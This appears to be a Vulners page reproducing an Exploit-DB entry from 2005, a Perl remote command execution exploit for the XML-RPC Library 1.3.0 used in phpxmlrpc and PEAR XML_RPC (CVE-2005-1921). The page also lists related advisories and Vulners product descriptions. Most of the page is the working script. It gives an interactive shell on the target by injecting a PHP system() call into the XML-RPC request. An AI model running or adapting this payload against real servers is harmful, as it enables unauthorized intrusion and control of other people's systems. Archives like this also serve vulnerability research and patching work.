Lucene search
+L

XML-RPC Library 1.3.0 - 'xmlrpc.php' Remote Command Execution (3)

🗓️ 04 Jul 2005 00:00:00Reported by Mike RifoneType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 46 Views

XML-RPC Library 1.3.0 Remote Command Execution Exploi

Related
Code
ReporterTitlePublishedViews
Family
freebsd
FreeBSD
postnuke -- multiple vulnerabilities
27 May 200500:00
freebsd
freebsd
FreeBSD
pear-XML_RPC -- arbitrary remote code execution
29 Jun 200500:00
freebsd
freebsd
FreeBSD
drupal -- PHP code execution vulnerabilities
29 Jun 200500:00
freebsd
attackerkb
ATTACKERKB
CVE-2005-2116
5 Jul 200504:00
attackerkb
cve
CVE
CAN-2005-1921
11 Aug 202421:51
cve
cve
CVE
CVE-2005-1921
1 Jul 200504:00
cve
nessus
Tenable Nessus
CentOS 3 / 4 : php (CESA-2005:564)
3 Jul 200600:00
nessus
nessus
Tenable Nessus
Debian DSA-745-1 : drupal - input validation errors
10 Jul 200500:00
nessus
nessus
Tenable Nessus
Debian DSA-746-1 : phpgroupware - input validation error
14 Jul 200500:00
nessus
nessus
Tenable Nessus
Debian DSA-747-1 : egroupware - input validation error
11 Jul 200500:00
nessus
Rows per page
#!/usr/bin/perl -w
# ********************************************************
# XML-RPC Remote Command Execution Exploit By Mike Rifone
# ********************************************************
# This works on da phpxmlrpc, and da PEAR XML_RPC too! All
# you need is to put the url to the server and u get shell
# Dis is my first exploit but hey it works :D ~Mike@Rifone
# ********************************************************

use LWP::UserAgent;

$brws = new LWP::UserAgent;
$brws->agent("Internet Explorer 6.0");

$host = $ARGV[0];

if ( !$host )
{
	die("Usage: xmlrpcexec.pl http://pathto/xmlrpcserver");
}

while ( $host )
{

	print "xmlrpc\@\#";

	$exec = <STDIN>;
	$data = "<?xml version=\"1.0\"?><methodCall><methodName>foo.bar</methodName><params><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><name>','')); system('$exec'); die; /*</name></value></param></params></methodCall>";

	$send = new HTTP::Request POST => $host;
	$send->content($data);
	$gots = $brws->request($send);
	$show = $gots->content;

	if ( $show =~ /<b>([\d]{1,10})<\/b><br \/>(.*)/is )
	{
	    print $2 . "\n";
	}
	else
	{
		print "$show\n";
	}


}

# milw0rm.com [2005-07-04]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Oct 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.79071
46